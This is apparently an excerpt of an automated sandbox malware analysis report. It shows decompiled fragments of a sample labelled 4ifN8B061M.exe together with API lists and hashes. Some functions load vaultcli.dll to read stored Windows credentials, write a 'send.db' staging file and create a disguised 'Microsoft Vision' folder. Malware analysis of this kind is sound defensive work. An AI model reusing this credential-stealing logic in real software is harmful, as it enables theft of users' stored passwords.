					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
				}
				if(_v16 != 0) {
					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
				}
				FreeLibrary( *(_t186 + 0xc0));
				E00255A2D(_t234);
				E00255A2D(0);
				return E00255A2D(0);
			}







































                                      0x00259eb1
                                      0x00259eb3
                                      0x00259eb6
                                      0x00259eb8
                                      0x00259ebb
                                      0x00259ebe
                                      0x00259ec1
                                      0x00259ec4
                                      0x00259ec7
                                      0x00259ed1
                                      0x00259eda
                                      0x00259edb
                                      0x00259edc
                                      0x00259ee9
                                      0x00259ef2
                                      0x00259ef6
                                      0x00259ef7
                                      0x00259efc
                                      0x00259f07
                                      0x00259f10
                                      0x00259f12
                                      0x00259f18
                                      0x00259f1b
                                      0x00259f1e
                                      0x00259f21
                                      0x00259f21
                                      0x00259f26
                                      0x00259f28
                                      0x00259f2f
                                      0x0025a053
                                      0x0025a054
                                      0x0025a057
                                      0x0025a05c
                                      0x0025a05f
                                      0x0025a061
                                      0x0025a070
                                      0x0025a086
                                      0x0025a090
                                      0x0025a095
                                      0x0025a098
                                      0x0025a09a
                                      0x0025a0a6
                                      0x0025a0ad
                                      0x0025a0c1
                                      0x0025a0c9
                                      0x0025a0d7
                                      0x0025a0e4
                                      0x0025a0ec
                                      0x0025a0f4
                                      0x0025a0f8
                                      0x0025a101
                                      0x0025a10b
                                      0x0025a111
                                      0x0025a113
                                      0x0025a11e
                                      0x0025a124
                                      0x0025a131
                                      0x0025a139
                                      0x0025a13e
                                      0x0025a13e
                                      0x0025a141
                                      0x0025a14a
                                      0x0025a151
                                      0x0025a159
                                      0x0025a159
                                      0x0025a161
                                      0x0025a166
                                      0x00000000
                                      0x0025a166
                                      0x00259f35
                                      0x00259f38
                                      0x00259f3b
                                      0x00259f3c
                                      0x00259f3f
                                      0x00259f44
                                      0x00259f49
                                      0x00259f55
                                      0x00259f6b
                                      0x00259f75
                                      0x00259f7a
                                      0x00259f7f
                                      0x00259f85
                                      0x00259f8b
                                      0x00259f92
                                      0x00259fa6
                                      0x00259fae
                                      0x00259fbc
                                      0x00259fc9
                                      0x00259fd1
                                      0x00259fd9
                                      0x00259fdc
                                      0x00259fdd
                                      0x00259fde
                                      0x00259fdf
                                      0x00259fe0
                                      0x00259fe3
                                      0x00259fe6
                                      0x00259fe9
                                      0x00259fea
                                      0x00259ff5
                                      0x00259ffd
                                      0x0025a010
                                      0x0025a018
                                      0x0025a01d
                                      0x0025a01d
                                      0x0025a020
                                      0x0025a029
                                      0x0025a030
                                      0x0025a038
                                      0x0025a038
                                      0x0025a040
                                      0x0025a045
                                      0x0025a169
                                      0x0025a169
                                      0x0025a169
                                      0x00259f49
                                      0x0025a16f
                                      0x0025a173
                                      0x0025a174
                                      0x0025a178
                                      0x0025a17b
                                      0x0025a184
                                      0x0025a184
                                      0x00259f12
                                      0x00259f07
                                      0x00259ee9
                                      0x0025a18b
                                      0x0025a190
                                      0x0025a190
                                      0x0025a19a
                                      0x0025a1a0
                                      0x0025a1a0
                                      0x0025a1ac
                                      0x0025a1b4
                                      0x0025a1bb
                                      0x0025a1cb

                                      APIs
                                        • Part of subcall function 0025A1FF: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0025A207
                                      • FreeLibrary.KERNEL32(?), ref: 0025A1AC
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253075: lstrcmpW.KERNEL32(?,?), ref: 0025307F
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                      • String ID: 4$8$Internet Explorer
                                      • API String ID: 708496175-747916358
                                      • Opcode ID: 054423995f2e99b4b91a6b392b39b133c35b13f7f82699e16651e197714889cb
                                      • Instruction ID: 00a99c570413f463e20a6d795a23f6aad6c85caa6548445a891278b1a557f9c9
                                      • Opcode Fuzzy Hash: 054423995f2e99b4b91a6b392b39b133c35b13f7f82699e16651e197714889cb
                                      • Instruction Fuzzy Hash: 05A12D70D20619ABCF04EFA5D8969EEBB79BF04341F108119F805B7252DB30AE69CF94
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0025D9DD, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135libraryloaderUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E0025D9DD() {
				intOrPtr _v6;
				signed int _v12;
				intOrPtr _v272;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t33;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t53;
				intOrPtr _t62;
				_Unknown_base(*)()* _t69;
				void* _t71;

				_v288 = 0x11c;
				_t33 = LoadLibraryA("ntdll.dll");
				if(_t33 == 0) {
					L3:
					_t71 = 2;
					if(_v272 != _t71) {
						goto L43;
					} else {
						_t35 = _v6;
						if(_t35 != 1) {
							if(_t35 == 2 || _t35 == 3) {
								if(_v284 != 5) {
									if(_v284 != 6) {
										if(_v284 != 0xa || _v280 != 0) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x2710;
										}
									} else {
										_t38 = _v280;
										if(_t38 != 0) {
											if(_t38 != 1) {
												if(_t38 != _t71) {
													if(_t38 != 3) {
														goto L43;
													} else {
														return (_v12 & 0x0000ffff) + 0x189c;
													}
												} else {
													return (_v12 & 0x0000ffff) + 0x1838;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x17d4;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x1770;
										}
									}
								} else {
									if(_v280 != 1) {
										if(_v280 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x1450;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x13ec;
									}
								}
							} else {
								goto L43;
							}
						} else {
							if(_v284 != 5) {
								if(_v284 != 6) {
									if(_v284 != 0xa || _v280 != 0) {
										goto L43;
									} else {
										return (_v12 & 0x0000ffff) + 0x3e8;
									}
								} else {
									_t53 = _v280;
									if(_t53 != 0) {
										if(_t53 != 1) {
											if(_t53 != _t71) {
												if(_t53 != 3) {
													goto L43;
												} else {
													return (_v12 & 0x0000ffff) + 0x276;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x26c;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x262;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x258;
									}
								}
							} else {
								_t62 = _v280;
								if(_t62 != 0) {
									if(_t62 != 1) {
										if(_t62 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x208;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x1fe;
									}
								} else {
									return (_v12 & 0x0000ffff) + 0x1f4;
								}
							}
						}
					}
				} else {
					_t69 = GetProcAddress(_t33, "RtlGetVersion");
					if(_t69 == 0) {
						L43:
						return 0;
					} else {
						 *_t69( &_v288);
						goto L3;
					}
				}
			}
















                                      0x0025d9eb
                                      0x0025d9f5
                                      0x0025d9fd
                                      0x0025da1c
                                      0x0025da1e
                                      0x0025da25
                                      0x00000000
                                      0x0025da2b
                                      0x0025da2b
                                      0x0025da30
                                      0x0025daef
                                      0x0025db00
                                      0x0025db30
                                      0x0025db7d
                                      0x00000000
                                      0x0025db88
                                      0x0025db92
                                      0x0025db92
                                      0x0025db32
                                      0x0025db32
                                      0x0025db3a
                                      0x0025db4a
                                      0x0025db59
                                      0x0025db69
                                      0x00000000
                                      0x0025db6b
                                      0x0025db75
                                      0x0025db75
                                      0x0025db5b
                                      0x0025db65
                                      0x0025db65
                                      0x0025db4c
                                      0x0025db56
                                      0x0025db56
                                      0x0025db3c
                                      0x0025db46
                                      0x0025db46
                                      0x0025db3a
                                      0x0025db02
                                      0x0025db09
                                      0x0025db1c
                                      0x00000000
                                      0x0025db1e
                                      0x0025db28
                                      0x0025db28
                                      0x0025db0b
                                      0x0025db15
                                      0x0025db15
                                      0x0025db09
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025da36
                                      0x0025da3d
                                      0x0025da7e
                                      0x0025dacf
                                      0x00000000
                                      0x0025dae2
                                      0x0025daec
                                      0x0025daec
                                      0x0025da80
                                      0x0025da80
                                      0x0025da88
                                      0x0025da98
                                      0x0025daa7
                                      0x0025dab7
                                      0x00000000
                                      0x0025dabd
                                      0x0025dac7
                                      0x0025dac7
                                      0x0025daa9
                                      0x0025dab3
                                      0x0025dab3
                                      0x0025da9a
                                      0x0025daa4
                                      0x0025daa4
                                      0x0025da8a
                                      0x0025da94
                                      0x0025da94
                                      0x0025da88
                                      0x0025da3f
                                      0x0025da3f
                                      0x0025da47
                                      0x0025da57
                                      0x0025da66
                                      0x00000000
                                      0x0025da6c
                                      0x0025da76
                                      0x0025da76
                                      0x0025da59
                                      0x0025da63
                                      0x0025da63
                                      0x0025da49
                                      0x0025da53
                                      0x0025da53
                                      0x0025da47
                                      0x0025da3d
                                      0x0025da30
                                      0x0025d9ff
                                      0x0025da05
                                      0x0025da0d
                                      0x0025db93
                                      0x0025db96
                                      0x0025da13
                                      0x0025da1a
                                      0x00000000
                                      0x0025da1a
                                      0x0025da0d

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0025D9F5
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0025DA05
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 9e707935453f0750dcebb89dfb796f770cf881e4275aea456845f548f494e7dc
                                      • Instruction ID: 6f4c954af86dc08f22d1dde720d0e69b26c965e5804774a3fe272c7e5b2e4c14
                                      • Opcode Fuzzy Hash: 9e707935453f0750dcebb89dfb796f770cf881e4275aea456845f548f494e7dc
                                      • Instruction Fuzzy Hash: 59416D30A2412E96DF348F55D8063FD73B59B51B4FF0008E5E945E01C1E6B8CEE8CA98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012E4AF7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123UNIQUE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: C:\Users\user\Desktop\4ifN8B061M.exe
                                      • API String ID: 0-3119849397
                                      • Opcode ID: 45347a26ce8f77680236a07694098a8b33db236ac047dbcf1bb75741270431e8
                                      • Instruction ID: 2a6ef321cf794836a799cfc5e86497fb82aabe5ca4a7f03de0f54679b13c3882
                                      • Opcode Fuzzy Hash: 45347a26ce8f77680236a07694098a8b33db236ac047dbcf1bb75741270431e8
                                      • Instruction Fuzzy Hash: BE419A75E20259AFDB21EF9998889AEBBFCEB99710F50019AE604D7300E7705940C750
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00260FE0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00260FE0(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t45;

				_t40 = __edx;
				 *[es:ebx+0x46183c1] =  *[es:ebx+0x46183c1] + __ecx;
				_t45 = __ecx;
				E00251052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t46 = _t45 + 4;
				E00253264(_t45 + 4, E00253412( &_v8,  &_v2080));
				E00255A2D(_v8);
				_t8 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E002534A6(E0025358E( &_v32, _t40, _t46),  *_t8, _a4);
				E00253492( &_v32);
				return _a4;
			}








                                      0x00260fe0
                                      0x00260fe3
                                      0x00261006
                                      0x00261008
                                      0x00261018
                                      0x0026102a
                                      0x00261036
                                      0x00261045
                                      0x0026104d
                                      0x00261055
                                      0x00261055
                                      0x0026105c
                                      0x0026105f
                                      0x00261067
                                      0x00261072
                                      0x0026107a
                                      0x00261085

                                      APIs
                                      • GetTempPathW.KERNEL32(00000400,?), ref: 00261018
                                      • lstrcatW.KERNEL32(?,send.db), ref: 0026102A
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                      • String ID: 5$send.db
                                      • API String ID: 891666058-2022884741
                                      • Opcode ID: 5c7c2d9924104be53dd3d29fca300d1f4cd12e722518a263d5a61f998a76de6a
                                      • Instruction ID: b401a0e132b9d8734b4ace32f6d1321420835edf9d78031bfb3e75a42d7f0482
                                      • Opcode Fuzzy Hash: 5c7c2d9924104be53dd3d29fca300d1f4cd12e722518a263d5a61f998a76de6a
                                      • Instruction Fuzzy Hash: 27118271D5011DABCB10EB64DC46BEEB7BCAF54311F04C079B805A2182EB789B6ACB94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 00260FEC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E00260FEC(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t35;
				void* _t37;

				_t35 = __edx;
				_t37 = __ecx;
				E00251052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t38 = _t37 + 4;
				E00253264(_t37 + 4, E00253412( &_v8,  &_v2080));
				E00255A2D(_v8);
				_t8 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E002534A6(E0025358E( &_v32, _t35, _t38),  *_t8, _a4);
				E00253492( &_v32);
				return _a4;
			}









                                      0x00260fec
                                      0x00261006
                                      0x00261008
                                      0x00261018
                                      0x0026102a
                                      0x00261036
                                      0x00261045
                                      0x0026104d
                                      0x00261055
                                      0x00261055
                                      0x0026105c
                                      0x0026105f
                                      0x00261067
                                      0x00261072
                                      0x0026107a
                                      0x00261085

                                      APIs
                                      • GetTempPathW.KERNEL32(00000400,?), ref: 00261018
                                      • lstrcatW.KERNEL32(?,send.db), ref: 0026102A
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 00253264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00253289
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                      • String ID: 5$send.db
                                      • API String ID: 891666058-2022884741
                                      • Opcode ID: dfad4a41c4c5735c90bc2786559e19611cc2dd60accaf51292cf793c6d71306e
                                      • Instruction ID: 972edae19fa19d29b36a6e32c3811887ade40f9f1739b4c624fe1198a6ac6738
                                      • Opcode Fuzzy Hash: dfad4a41c4c5735c90bc2786559e19611cc2dd60accaf51292cf793c6d71306e
                                      • Instruction Fuzzy Hash: D2015E7191011DABCB10EB64DC46AEEB7BCAF54311F10C065A905A2081EB749B6ACB94
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      Function 002613C8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 66%
                                      			E002613C8(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _v28;
				char _v32;
				short _v552;
				void* _t34;

				_t34 = __edx;
				_v8 = 0;
				E00251052( &_v552, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
				lstrcatW( &_v552, L"\\Microsoft Vision\\");
				E00253297( &_v8, _t34, 0,  &_v552);
				_v32 = 0x3b;
				asm("xorps xmm0, xmm0");
				_v28 = 0;
				asm("movups [ebp-0x14], xmm0");
				E002534A6(E0025358E( &_v32, _t34,  &_v8), 0, _a4);
				E00253492( &_v32);
				E00255A2D(_v8);
				return _a4;
			}








                                      0x002613c8
                                      0x002613e1
                                      0x002613e4
                                      0x002613f8
                                      0x0026140a
                                      0x0026141a
                                      0x00261425
                                      0x0026142c
                                      0x0026142f
                                      0x00261436
                                      0x00261441
                                      0x00261449
                                      0x00261451
                                      0x0026145b

                                      APIs
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 002613F8
                                      • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 0026140A
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FolderFreePathVirtuallstrcat
                                      • String ID: ;$\Microsoft Vision\
                                      • API String ID: 1529938272-253167065
                                      • Opcode ID: 0eacff633f2fb1024864bf4974cd9fcf9aac6cf1f482f979f3867ca0d1b667da
                                      • Instruction ID: 4245fa46c9f3b8b48320343d6e5eea706a14a773bac25ced59a685ec1419924e
                                      • Opcode Fuzzy Hash: 0eacff633f2fb1024864bf4974cd9fcf9aac6cf1f482f979f3867ca0d1b667da
                                      • Instruction Fuzzy Hash: 55011BB1C1011DEACB10EBA0ED4ADDFBBBCAF18345F104155B905A2081EB74AB99CFD4
                                      Uniqueness

                                      Uniqueness Score: 6.84%

                                      Function 0025D469, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E0025D469() {
				intOrPtr _v6;
				char _v288;
				struct HINSTANCE__* _t4;
				intOrPtr _t5;
				_Unknown_base(*)()* _t9;

				_v288 = 0x11c;
				_t4 = LoadLibraryA("ntdll.dll");
				if(_t4 == 0) {
					L3:
					_t5 = _v6;
					if(_t5 == 2 || _t5 == 3) {
						return 1;
					} else {
						goto L5;
					}
				} else {
					_t9 = GetProcAddress(_t4, "RtlGetVersion");
					if(_t9 == 0) {
						L5:
						return 0;
					} else {
						 *_t9( &_v288);
						goto L3;
					}
				}
			}








                                      0x0025d477
                                      0x0025d481
                                      0x0025d489
                                      0x0025d4a4
                                      0x0025d4a4
                                      0x0025d4a9
                                      0x0025d4b7
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025d48b
                                      0x0025d491
                                      0x0025d499
                                      0x0025d4af
                                      0x0025d4b2
                                      0x0025d49b
                                      0x0025d4a2
                                      0x00000000
                                      0x0025d4a2
                                      0x0025d499

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0025D481
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0025D491
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 4819fa932db7c91cf80bc646bb5d729c22096b617b388f3f018ee0a07d268497
                                      • Instruction ID: b393edd51db3c3ad06099b07016f5b7cff2712eeb7a52e9ad8b98d63ebd6cbda
                                      • Opcode Fuzzy Hash: 4819fa932db7c91cf80bc646bb5d729c22096b617b388f3f018ee0a07d268497
                                      • Instruction Fuzzy Hash: C9E068302A020907DF383F799C0F7D737A80F03746F0400A0EE8AD0081DA78D89ACAD4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025D4B8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E0025D4B8() {
				intOrPtr _v272;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;

				_v288 = 0x11c;
				_t5 = LoadLibraryA("ntdll.dll");
				if(_t5 == 0) {
					L3:
					if(_v272 != 2) {
						goto L5;
					} else {
						return _v284;
					}
				} else {
					_t8 = GetProcAddress(_t5, "RtlGetVersion");
					if(_t8 == 0) {
						L5:
						return 0;
					} else {
						 *_t8( &_v288);
						goto L3;
					}
				}
			}








                                      0x0025d4c6
                                      0x0025d4d0
                                      0x0025d4d8
                                      0x0025d4f3
                                      0x0025d4fa
                                      0x00000000
                                      0x0025d4fc
                                      0x0025d503
                                      0x0025d503
                                      0x0025d4da
                                      0x0025d4e0
                                      0x0025d4e8
                                      0x0025d504
                                      0x0025d507
                                      0x0025d4ea
                                      0x0025d4f1
                                      0x00000000
                                      0x0025d4f1
                                      0x0025d4e8

                                      APIs
                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0025D4D0
                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0025D4E0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RtlGetVersion$ntdll.dll
                                      • API String ID: 2574300362-1489217083
                                      • Opcode ID: 785180bdd7dfe01db4543ba1d932049201575be9eb784520d2baf7aa2bd21b9d
                                      • Instruction ID: 35c5af61dbb6109af296a6ac3eedd1d43d9700be8b0e6c332021480ef5bdd282
                                      • Opcode Fuzzy Hash: 785180bdd7dfe01db4543ba1d932049201575be9eb784520d2baf7aa2bd21b9d
                                      • Instruction Fuzzy Hash: 7EE0123065021A97DB34AF65AC0BAD677B85B02749F4084D4EA09E1091EAB4D999CED0
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025B66A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E0025B66A() {
				intOrPtr _t4;
				void* _t5;
				int _t9;
				void* _t16;
				void* _t17;

				DeleteCriticalSection(0x267bf8);
				_t4 =  *0x267bec; // 0x0
				if(_t4 != 0) {
					__eax = CloseHandle(__eax);
				}
				_t5 =  *0x267be4; // 0x0
				if(_t5 != 0) {
					CloseHandle(_t5);
				}
				L1();
				__imp__#116(_t17); // executed
				E0025E221(0x2679fc);
				E00252E66(0x267854);
				E00252E66(0x267834);
				_t16 =  *0x267824;
				_t9 = VirtualFree(_t16, 0, 0x8000); // executed
				return _t9;
			}








                                      0x0025b66f
                                      0x0025b675
                                      0x0025b67c
                                      0x0025b67f
                                      0x0025b67f
                                      0x0025b685
                                      0x0025b68c
                                      0x0025b68f
                                      0x0025b68f
                                      0x0025b69a
                                      0x00255110
                                      0x0025511c
                                      0x00255124
                                      0x0025512c
                                      0x00255131
                                      0x00255a35
                                      0x00255a3b

                                      APIs
                                      • DeleteCriticalSection.KERNEL32(00267BF8), ref: 0025B66F
                                      • CloseHandle.KERNEL32(00000000), ref: 0025B67F
                                      • CloseHandle.KERNEL32(00000000), ref: 0025B68F
                                      Strings
